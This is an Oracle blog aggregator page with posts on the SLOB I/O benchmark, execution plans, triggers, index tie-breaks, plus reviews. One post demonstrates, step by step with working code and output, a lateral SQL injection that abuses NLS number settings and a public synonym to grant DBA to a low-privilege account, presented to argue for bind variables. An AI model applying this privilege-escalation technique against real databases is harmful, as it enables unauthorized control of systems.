Search

OakieTags

Who's online

There are currently 0 users and 33 guests online.

Recent comments

Oakies Blog Aggregator

Introducing SLOB – The Silly Little Oracle Benchmark

BLOG UPDATE 2012.0.2.8: I changed the URL to the kit and uploaded a new tar archive with permissions changes

We’ve all been there.  You’re facing the need to assess Oracle random physical I/O capability on a given platform in preparation for OLTP/ERP style workloads. Perhaps the storage team has assured you of ample bandwidth for both high-throughput and high I/O operations per second (IOPS).  But you want to be sure and measure for yourself so off you go looking for the right test kit.

There is no shortage of transactional benchmark kits such as Hammerora, Dominic Giles’ SwingBench, and cost-options such as Benchmark Factory.  These are all good kits. I’ve used them all more than once over the years. The problem with these kits is they do not fit the need posed in the previous paragraph.  These kits are transactional so the question becomes whether or not you want to prove Oracle scales those applications on your hardware or do you want to test IOPS capacity? You want to test IOPS. So now what?

What About Orion?

The Orion tool has long been a standard for testing Oracle block-sizes I/O via the same I/O libraries linked into the Oracle server.  Orion is a helpful tool, but it can lead to a false sense of security.  Allow me to explain. Orion uses no measurable processor cycles to do its work. It simply shovels I/O requests into the kernel and the kernel (driver) clobbers the same I/O buffers in memory with the I/O (read) requests again and again. Orion does not care about the contents of I/O buffers and therein lies the weakness of Orion.

At one end of the spectrum we have fully transactional application-like test kits (e.g., SwingBench) or low-level I/O generators like Orion. What’s really needed is something right in the middle and I propose that something is SLOB—the Silly Little Oracle Benchmark.

What’s In A Name?

SLOB stands for Silly Little Oracle Benchmark. SLOB, however, is neither a benchmark nor silly. It is rather small and simple though. I need to point out that by force of habit I’ll refer to SLOB with terms like benchmark and workload interchangeably. SLOB aims to fill the gap between Orion and full function transactional benchmarks. SLOB possesses the following characteristics:

  1. SLOB supports testing Oracle logical read (SGA buffer gets) scaling
  2. SLOB supports testing physical random single-block reads (db file sequential read)
  3. SLOB supports testing random single block writes (DBWR flushing capacity)
  4. SLOB supports testing extreme REDO logging I/O
  5. SLOB consists of simple PL/SQL
  6. SLOB is entirely free of all application contention

Yes, SLOB is free of application contention yet it is an SGA-intensive workload kit. You might ask why this is important. If you want to test your I/O subsystem with genuine Oracle SGA-buffered physical I/O it is best to not combine that with application contention.

SLOB is also great for logical read scalability testing which is very important, for one simple reason: It is difficult to scale physical I/O if the platform can’t scale logical I/O. Oracle SGA physical I/O is prefaced by a cache miss and, quite honestly, not all platforms can scale cache misses. Additionally, cache misses cross paths with cache hits. So, it is helpful to use SLOB to test your platform’s ability to scale Oracle Database logical I/O.

What Is The History Of The Kit

I wrote parts of it back in the 1990s when I was in the Advanced Oracle Engineering group at Sequent Computer Systems and some of it when I was the Chief Architect of Oracle Database Solutions at PolyServe (acquired by HP in 2007). PolyServe was one of the pioneers in multi-headed scalable NAS and I needed workload harnesses that could drive I/O according to my needs.  The kit is also functionally equivalent to what I used in my own engineering work while I was the Performance Architect in Oracle’s Exadata engineering group (Systems Technology).  In short the kit has a long heritage considering how simple it is.

What’s In The Kit?

There are no benchmark results included. The kit does, however, include:

  • README files. A lot of README files. I recommend starting with ~/README-FIRST.
  • A simple database creation kit.  SLOB requires very little by way of database resources. I think the best approach to testing SLOB is to use the simple database creation kit under ~/misc/create_database_kit.  The directory contains a README to help you on your way. I generally recommend folks use the simple database creation kit to create a small database because it uses Oracle Managed Files so you simply point it to the ASM diskgroup or file system you want to test. The entire database will need no more than 10 gigabytes.
  • An IPC semaphore based trigger kit.  I don’t really need to point out much about this simple IPC trigger kit other than to draw your attention to the fact that the kit does require permissions to create a semaphore set with a single semaphore. The README-FIRST file details what you need to do to have a functional trigger.
  • The workload scripts. The setup script is aptly named setup.sh and to run the workload you will use runit.sh. These scripts are covered in README-FIRST.
  • Init.ora files. You’ll find test.ora under ~/misc/sample_data. The purpose of this init.ora is to show just how little tweaking Oracle Database requires to scale physical I/O and logical reads. The directory is named sample_data because I originally intended to offer pairs of init.ora and AWR reports so folks could see what different systems I’ve tested, what performance numbers I’ve seen and the recipe I used (the combination of connected pseudo users and init.ora parameters). The name of the directory remains but I pulled the content so as to not excite Oracle’s lawyers.

Models

The size of the SGA buffer pool is the single knob to twist for which workload profile you’ll generate. For instance, if you wish to have nothing but random single block reads you simply run with the smallest db_cache_size your system will allow you to configure (see README-FIRST for more on this matter).  On the other hand, the opposite is what’s needed for logical I/O testing. That is, simply set db_cache_size to about 4GB, perform a warm-up run and from that point on there will be no physical I/O. Drive up the number of connected pseudo users and you’ll observe logical I/O scale up bounded only by how scalable your platform is.  The other models involve writes. If you want to drive a tremendous amount of REDO writes you will again configure a large db_cache_size and execute runit.sh with only write sessions. From that point you can reduce the size of db_cache_size while maintaining the write sessions, which will drive DBWR into a frenzy.

Who Has Used The Kit?

Several folks from the OakTable Network and other friends. Perhaps they’ll chime in on their findings and what they have learned about their platform as a result of testing with SLOB.

What You Should Expect From SLOB

I/O, lots of it! If you happen to be an Exadata user you’ll see about 190,000 physical read I/O (from Exadata Smart Flash Cache) generated from each instance of RAC in your configuration. Oracle does not misrepresent the truth in their datasheets regarding Exadata random cache reads. If you have a full-rack Exadata you too can now study the system characteristics under an approximated 1.5 million read IOPS workload. Testing Exadata with the write-intensive SLOB models will reveal capacities for DBWR and LGWR flushing.  If you have conventional storage you’ll drive the maximum it will sustain.

Where Is The Kit?

I’ve uploaded it to the OakTable.net website at the following URL. Simply extract the gzipped tar archive into a working directory and see README-FIRST.

http://oaktable.net/articles/slob-silly-little-oracle-benchmark

Filed under: oracle

Index Scan with Filter Predicate Based on a Subquery

Most execution plans can be interpreted by following few basic rules (in TOP, Chapter 6, I provide such a list of rules). Nevertheless, there are some special cases. One of them is when an index scan, in addition to the access predicate, has a filter predicate applying a subquery.

The following execution plan, taken from Enterprise Manager 11.2, is an example (click on the image to increase its size):
Execution Plan
Notes:

  • According to the order column the first operation being executed is the scan of the I2 index. Unfortunately this is wrong. In fact the first operation being executed is the scan of the I1 index. This is a bug in Enterprise Manager. I wanted to show you this example to demonstrate that not only for us it might be difficult to correctly interpret an execution plan ;-)
  • The filter predicate IS NOT NULL is also wrong. This is not a bug, however. It is a limitation in the current implementation. The problem is that in some cases the V$SQL_PLAN and V$SQL_PLAN_STATISTICS_ALL views are not able to show all the necessary details.

Without seeing the query on which this execution plan is based, it is not obvious at all to know what’s going on. So, here is the query:

SELECT *
FROM t1
WHERE n1 = 8
AND n2 IN (SELECT t2.n1 FROM t2, t3 WHERE t2.id = t3.id AND t3.n1 = 8) 

Based on the query it is essential to point out that the access predicate "T2"."N1"=:B1 cannot be evaluated and, therefore, the scan of the I2 index cannot be carried out, without having a value passed through the B1 bind variable. In other words, without knowing the value of T1.N2.

To describe how this execution plan is carried out, let’s have a look to the information provided by the DBMS_XPLAN.DISPLAY function (which does not expose the limitation related to the filter predicate).

-----------------------------------------------
| Id  | Operation                      | Name |
-----------------------------------------------
|   0 | SELECT STATEMENT               |      |
|   1 |  TABLE ACCESS BY INDEX ROWID   | T1   |
|*  2 |   INDEX RANGE SCAN             | I1   |
|   3 |    NESTED LOOPS                |      |
|   4 |     TABLE ACCESS BY INDEX ROWID| T2   |
|*  5 |      INDEX RANGE SCAN          | I2   |
|*  6 |     TABLE ACCESS BY INDEX ROWID| T3   |
|*  7 |      INDEX RANGE SCAN          | I3   |
-----------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------
2 - access("N1"=8)
    filter( EXISTS (SELECT /*+ LEADING ("T2" "T3") USE_NL ("T3") INDEX
           ("T3" "I3") INDEX_RS_ASC ("T2" "I2") */ 0 FROM "T3" "T3","T2" "T2" WHERE
           "T2"."N1"=:B1 AND "T3"."N1"=8 AND "T2"."ID"="T3"."ID"))
5 - access("T2"."N1"=:B1)
6 - filter("T2"."ID"="T3"."ID")
7 - access("T3"."N1"=8)

The operations are carried out as follows:

  1. Operation 2 applies the access predicate "N1"=8 by scanning the I1 index.
  2. For each key returned by the previous scan, the subquery is executed once. Note that the subquery carries out a nested loop. While the outer loop accesses the T2 table, the inner loop accesses the T3 table.
  3. The first operation of the outer loop is operation 5. It applies the access predicate "T2"."N1"=:B1 by scanning the I2 index. Based on the rowid returned by the index access the T2 table is accessed (operation 4).
  4. For each row returned by the outer loop, the inner loop is executed once. The first operation of the inner loop is operation 7. It applies the access predicate "T3"."N1"=8 by scanning the I3 index. Based on the rowid returned by the index access the T3 table is accessed (operation 6) and the filter predicate "T2"."ID"="T3"."ID" (the join condition) is applied. By the way, it is interesting to notice that, contrary to the join condition is not applied as an access predicate, as it usually happens.
  5. If the subquery returns a row, the rowid returned by operation 2 can be used to access the T1 table (operation 1). The row extracted from this operation is sent to the caller.

All in all, this is a very special execution plan…

In summary, be careful when you see an index scan with a filter predicate applying a subquery. The execution plan might not be carried out as you expect at first sight. It is also essential to point out that in such a case the predicate information is essential to fully understand what’s going on.

Where TK agrees with TK (or: why are triggers harmful)

Sofar we've explored playing around with a few triggers to implement a business rule. In this post I'd like to step back a bit and take a birds-eye view at the common use-cases that I see brought up for introducing triggers into the app-development picture.

The first use-case is: we use triggers to assign or modify column values of mutating rows (that is, rows currently being inserted, updated, or deleted). Here's a few typical examples of this use case that, I'm sure, must look familiar to you too.

For this use-case we always use a row-level trigger (for each row), as this type of trigger allows us to manipulate :new.[column-name] variables. We can re-assign supplied (by the trigger DML-statement) column values, or initialize ones that were not supplied. So for instance the use enters all column-values but the Created and By_User columns, which are initialized by a row-trigger we wrote.
The second use-case is: we use triggers to execute insert/update/delete statements. So we perform some DML against a table. This table has some trigger, in which we perform more DML.

Of course this can lead to a cascading effect: the DML that we perform from within our trigger body might be against a table that too has triggers. In which there might be more DML-statements performed, and so on and so forth. Typical examples of why we perform DML-statements inside triggers, are: we want to audit changes against the table, or we want to maintain redundant data stored elsewhere in the database design.

The third use-case is: we use triggers to execute non-transactional stuff. And by "non-transactional" I mean stuff that, once executed inside our transaction, does not participate in a rollback, in case we (the code-path) decides to perform one.

The most beautiful example of the last decade for this is, we call a web-service inside our trigger body. In case this is a web-service that actually 'does something' (changes/transacts information at/behind the endpoint of the service), then obviously when we rollback our triggering DML-statement, whatever was changed by the web-service, remains changed. Other examples of this use-case are: we send email from our trigger body, or perform file I/O. We can also perform an autonomous transaction (one that actually performs some DML which given it's executed inside the autonomous TX, cannot be rolled back by the parent transaction). This is actually a blend of this use-case with the previous one.

So what's harmful about all these use-cases? Well, they make stuff happen automagically (copyright the other TK).

What we mean by this is, that instead of only getting the effect of the triggering DML-statement, you also get the effect of whatever is being performed inside the trigger body. And exactly that is the harmful bit.

In a SQL DBMS, the insert, update and delete 'operators', constitute three primitive operators that we can use to manipulate the data held inside the database (tables). Primitive here is used in the sense of primary or basic. Sort of like Inc(rement) and Dec(rement) are primitives that can be used in machine language to increase or decrease a register's value. These primitive operators have well understood and universally known change-semantics. Say you start with an empty EMP table, you then insert a employee row, you will end up with a change of the EMP table: it now has a single row in it. And all other bits and pieces of the database remain unchanged.

Triggers executing automagic stuff change these universally well-understood change-semantics of our three primitive operators.

And this is harmful: because nobody (after you've gone) expects insert, update or delete to quietly behave  differently. For those of you who have done some machine programming in a distant past: it's like increasing one of your registers, and suddenly (as an automagic side-effect) the top of the execution stack is increased also and has some subroutine's address pushed on it. Not something you'd expect...

The TCO (total cost of ownership) of an application sits not in initially building the thing. It sits in the years, sometimes decades, the thing lives. And you, but more probably others, maintain it. And more often than not these developers expect their available primitive operators to follow the primitive change-semantics.

I'll finish this post with the following thought:

If you agree on the three use-cases discussed being harmful, do you then also agree with me that:
  • The cascade delete option of a foreign key, and
  • The default clause of a table column, and
  • The char (fixed-length) datatype
are to be considered harmful too.
Aren't they conceptually about the exact same problem? Introducing different change-semantics to our three primitive operators?
I'd be interested to hear of any other 'features' that change the way insert, update or delete behave.

Index naming

Here’s a model of a little problem I came across recently. It’s something I wrote about many years ago, and I thought I’d seen a note on Metalink explaining that the issue had been addressed; but the problem is still there, even in 11.2.0.3.

We start with a little data set (and it’s my standard setup of 8KB blocks, LMTs, 1MB uniform extents, and no ASSM):

create table t1
as
with generator as (
	select	--+ materialize
		rownum id 
	from dual 
	connect by 
		level <= 10000
)
select
	trunc((rownum-1)/2)	product_id,
	mod(rownum-1,2)		flag1,
	mod(rownum-1,3)		flag2,
	rownum			n1,
	lpad(rownum,30)		v1
from
	generator	v1,
	generator	v2
where
	rownum <= 1000000
;


-- collect stats, compute, no histograms

alter table t1 add constraint t1_pk primary key (product_id,flag1, flag2) 
using index (
	create unique index t1_pk on t1(product_id, flag1, flag2)
);

create index t1_i1 on t1(product_id, flag2, flag1, n1,v1);

As so often happens with the anomalies I uncover on client sites, there’s something a bit odd about this model. The second index starts with all the columns of the primary key (although the column order is slightly different). There is a rationale for this: the second index makes a big difference to a particular overnight batch job because it eliminates a large number of random accesses to a very big table. The intention is to drop the primary index eventually and use this larger index to cover the primary key.

Here’s an example of a very simple SQL statement which is run very frequently during the day – but don’t ask why this statement happens, there is a good rationale but it would take a lengthy explanation.

select
	rowid
from
	t1
where
	product_id = 2500
;

Which index do you think Oracle will use to execute this query ? If it’s not obvious from the index definitions I’ll give you an extra clue by reporting a few of the index statistics as well.

INDEX_NAME             BLEVEL LEAF_BLOCKS CLUSTERING_FACTOR 
-------------------- -------- ----------- ----------------- 
T1_PK                       2       2,807             7,088 
T1_I1                       2       7,996             7,154 

The answer is that Oracle uses the larger index. Here are the execution plans I get from hinting the query to use each index in turn:

============
Hinted to PK
============

----------------------------------------------------------
| Id  | Operation        | Name  | Rows  | Bytes | Cost  |
----------------------------------------------------------
|   0 | SELECT STATEMENT |       |     2 |    34 |     3 |
|*  1 |  INDEX RANGE SCAN| T1_PK |     2 |    34 |     3 |
----------------------------------------------------------

======================
Hinted to larger index
======================

----------------------------------------------------------
| Id  | Operation        | Name  | Rows  | Bytes | Cost  |
----------------------------------------------------------
|   0 | SELECT STATEMENT |       |     2 |    34 |     3 |
|*  1 |  INDEX RANGE SCAN| T1_I1 |     2 |    34 |     3 |
----------------------------------------------------------

The two indexes produce the same cost (and you can check this in more detail in the 10053 trace) – so why does Oracle use the “wrong” index ? Because when you sort the index names alphabetically, T1_I1 comes before T1_PK. If you doubt me at this point, by the way, just run the test and then repeat it using the name T1_XX instead of T1_I1.

You might think the problem has something to do with bad statistics, of course – but that’s why I sepcified compute in the stats collection. To hammer the point home I’ve also run tests hacking the statistics on the T1_I1 index, doubling virtually every statistic (leaf blocks, clustering_factor, etc.) except the number of distinct keys – which I halved. There is a statistical solution – but I’d have to push the statistics on this index a very long way before the arithmetic for this query made the larger index more expensive than the smaller one.

I thought I’d seen a note on MOS (Metalink) saying that this tie-break situation had been addressed with an extra test based on the number of distinct keys, (I’m not sure it’s been implemented, but clearly these two indexes have the same number of distinct key anyway). Perhaps a check on the absolute number of leaf blocks in the index might also be in order if the key count is a tie. In the meantime, of course, I can add a SQL Baseline to the query.

The choice of index doesn’t make any difference to the performance of any individual execution of the query, of course, but it does mean that I don’t have both the indexes taking up space in the cache during the day when the larger index shouldn’t really be used, so statistically the wrong choice has an impact on every execution of this query and every other query on the system.

Repairman Jack: The Tomb…

The Tomb is the first book in the Repairman Jack series by F. Paul Wilson.

Jack fixes things. Not washing machines and stuff like that. He fixes situations for people. It’s a job that takes him outside the law and means he has to separate himself from most of the things society think of as normal. It also recently separated him from his girlfriend when she found out his job doesn’t involve fixing household appliances. Now he’s got to fix a situation for his ex girlfriend involving a family curse that started generations ago in India.

Followers of the blog know I love The Dresden Files and the Felix Castor series. Repairman Jack hooks into exactly the same groove for me. Harry Dresden, Felix Castor and Jack are the same type of men. Strong, self-reliant and they get the job done in an action-packed way. Very appealing for a cowardly computer geek like myself… :) I’m looking forward to the next 14 books in the series.

Cheers

Tim…




Oracle Query Optimizer Vanishing Acts

February 3, 2012 A couple of days ago I noticed an interesting thread in the comp.databases.oracle.server Usenet group that described a problem of vanishing tables.  The title of the thread certainly caught my attention, and I was a bit disappointed when I found that the there was little to no magic involved in the vanishing act.  The situation reported [...]

Captain Support: Not to the rescue…

This morning, the display on one of my computers was a bit odd. I rebooted the machine and when it came up I got no output on the monitor. I plugged my laptop into the monitor and that worked fine, so it looked like the graphics card had died. I popped down to a local PC store and had the choice of remortgaging my house for new graphics card, or buying a cheap and cheerful one. I did the latter. Even so, the new card was much flasher than the old one.

I put the card in the machine and it booted up and I had a display again. Trouble was, GNOME shell had failed to start and I was knocked back into fallback mode, that looks a bit like GNOME2. Sigh. Forgot to check the the card against support for the ever-so-picky GNOME shell.

I now have a choice to make:

  • Ditch it and get a new graphics card… again…
  • Switch to KDE or XFCE… shudder…
  • Stay with the fallback option until Fedora 17, when allegedly GNOME shell will not be so bloody fussy.

I’m probably going to stick with the last option as I can’t be bothered to waste any more time on this. All of a sudden, Windows and Mac OS X don’t seem so bad after all…

Cheers

Tim…

PS. I don’t need a lecture on why GNOME shell is so picky. I know all the arguments. I’ve read all the crap. Doesn’t mean it’s not a pain in the ass when you buy a newer and more powerful graphics card and you end up with an inferior user experience.




Chronicle…

I thought Chronicle was a cool film. Three kids find some weird object and develop super powers. How will it affect them and how will they choose to use them?

It has the “shot on my camcorder” feel, like Cloverfield, and has a kind of Akira feel to me. While I was watching it I kept expecting someone to say, “With great power comes great responsibility!” :)

The effects are pretty cool. At the start they look like they are going to be a bit low budget, but by the end they get pretty impressive.

Nice mix of teen angst, super powers and destruction. Obviously not targeted for 42 year old men, but it hit the mark for me. I guess that says a lot. :)

Cheers

Tim…




All about Security - SQL Injection redux

I just wrote about SQL Injection yesterday - after having giving a web seminar on Wednesday the touched on the topic.

One of the comments on that post was by David Litchfield, he wrote:

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">Hey Tom,#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploit DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; font-size: x-small;">

I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well.  It is just a variation on a theme after all).  In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers.  That is something I hadn't considered before.  NLS settings for numbers are different than for dates.  With a date, I can set the format string to have any string of characters I want.  With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.

But - you can.  Just not as flexibly.  But the end result can be as disastrous.

One of the follow on comments to this posting by David was:

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">the problem David mentions in #333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers #333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">only arises since NUM_PROC is owned by SYS,#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">as far as I can see, correct ? 

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">So, it's not really a problem since nobody ever does something as SYS, correct.

In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw".  But - it doesn't.  All it requires is an account with these privileges:

  • Create session
  • Create procedure
  • Create public synonym <<<=== these guys are evil!  Should be avoided
And another schema that has the ability to GRANT stuff - like DBA.  It doesn't have to be DBA, it could be any privilege they have the ability to grant.
Here is how to exploit the flaw.  First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS.  Then you'll understand how:
a%ORA11GR2> select .1 from dual;

        .1
----------
        P1
works.  Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this.  I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:
ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number )
  2  as
  3      l_query  long;
  4      l_cursor sys_refcursor;
  5      l_rec    all_users%rowtype;
  6  begin
  7      l_query := '
  8       select *
  9         from all_users
 10        where user_id = ' || l_num;
 11      dbms_output.put_line( l_query );
 12  
 13      open l_cursor for l_query;
 14  
 15      loop
 16          fetch l_cursor into l_rec;
 17          exit when l_cursor%notfound;
 18          dbms_output.put_line( 'username = ' || 
                                   l_rec.username );
 19      end loop;
 20      close l_cursor;
 21  end;
 22  /
Procedure created.
Then, we'll have our account with the small set of privileges:
ops$tkyte%ORA11GR2> create user a identified by a;
User created.

ops$tkyte%ORA11GR2> grant create session, create procedure,
                    create public synonym to a;
Grant succeeded.
and we'll allow it to access this procedure - just like in my original SQL Injection article:
ops$tkyte%ORA11GR2> grant execute on do_something to a;
Grant succeeded.
Ok, so now we'll log in as A and run the procedure to see what it does:
ops$tkyte%ORA11GR2> connect a/a
Connected.
a%ORA11GR2> 
a%ORA11GR2> exec ops$tkyte.do_something( 5 );

     select *
       from all_users
      where user_id = 5
username = SYSTEM

PL/SQL procedure successfully completed.
Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:
a%ORA11GR2> create or replace function foobar return number
  2  authid current_user
  3  as
  4      pragma autonomous_transaction;
  5  begin
  6      execute immediate 'grant dba to a';
  7      return 5;
  8  end;
  9  /
Function created.
And then set up our public synonym for it and allow others to execute it:
a%ORA11GR2> create public synonym p1 for foobar;
Synonym created.

a%ORA11GR2> grant execute on foobar to public;
Grant succeeded.
and now for the magic:
a%ORA11GR2> alter session set nls_numeric_characters = 'P ';
Session altered.
and viola:
a%ORA11GR2> set role dba;
set role dba
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist


a%ORA11GR2> exec ops$tkyte.do_something( .1 );

     select *
       from all_users
      where user_id = P1
username = SYSTEM

PL/SQL procedure successfully completed.

a%ORA11GR2> set role dba;

Role set.
I have DBA...
SQL Injection is insidious.  SQL Injection is hard to detect.  SQL Injection can be avoided - by simply using bind variables.  In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited.  The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".  
It is really hard to protect yourself from something you cannot see.



Updated a little later: Let me also say this:

If you use static sql in plsql - your code in plsql cannot be sql injected, period.  It is not possible.  The only way to get sql injected in plsql is to use dynamic sql - that is the only time.  So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:

a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database

If you do that - no SQL Injection attacks are possible.  

RMOUG

Just a quick reminder that the Rocky Mountain Oracle User Group Training days are just eleven days away. It’s one of the best Oracle events I’ve attended, and I’ll be there again this year. There are plenty of good speakers and interesting presentations on a wide range of topics – and if you’re wandering around between sessions with nothing to do, I’ll be around too and will be happy to say hello and have a chat.

Here’s the list of things I’ve pencilled in on my timetable so far. (Some of the gaps are there because I’m doing three presentations myself, some are there because I haven’t decided what to see yet.)

Wednesday 9:15 Database I/O Performance: Measuring and Planning – Alex Gorbachev, Pythian
10:45 Parallel Execution in RAC – Riyaj Shamsudeen, OraInternals
Lunch I’ll be on one of the ACE Director’s lunch tables
1:15 I’ll be speaking on “Single Table Access Paths”
16:00 Making Sense of Big Data – Gwen Shapira, Pythian
17:15 I’ll be speaking on “Two Table Joins”
Thursday 8:30 Developing and Deploying Extremely Large Databases with Oracle 11gR2 – Daniel Morgan, Morgan’s Library
9:45 Mining the AWR Repository for Capacity Planning, Visualization, and other Real World Stuff – Karl Arao, Enkitec
11:15 I’ll be speaking on “Beating the Oracle Optimizer”
13:30 Using Oracle Execution Plans for Performance Gains – Janis Griffin, Confio Software

If nothing else catches your eye, don’t miss out the opportunity to hear Maria Colgan talking about the optimizer. She’s doing three presenations (and only one of them coincides with one of mine) and they’re all worth hearing.